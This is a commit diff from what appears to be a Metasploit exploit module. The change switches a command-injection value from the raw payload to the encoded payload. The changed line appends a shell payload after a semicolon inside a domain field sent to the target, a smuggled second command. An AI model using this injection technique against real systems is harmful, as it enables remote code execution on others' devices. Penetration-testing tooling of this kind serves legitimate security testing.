Use payload.encoded because BadChars are defined
parent
dc9246a770
commit
accad24f31
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
print_status("#{rhost}:#{rport} - Executing payload...")
|
||||
url = "http://www.#{rand_text_alpha(10 + rand(10))}.com"
|
||||
domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.raw}"
|
||||
domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.encoded}"
|
||||
# very short timeout because the request may never return if we're
|
||||
# sending a socket payload
|
||||
send_exploit_query(url, domain, 0.01)
|
||||
|
|
Loading…
Reference in New Issue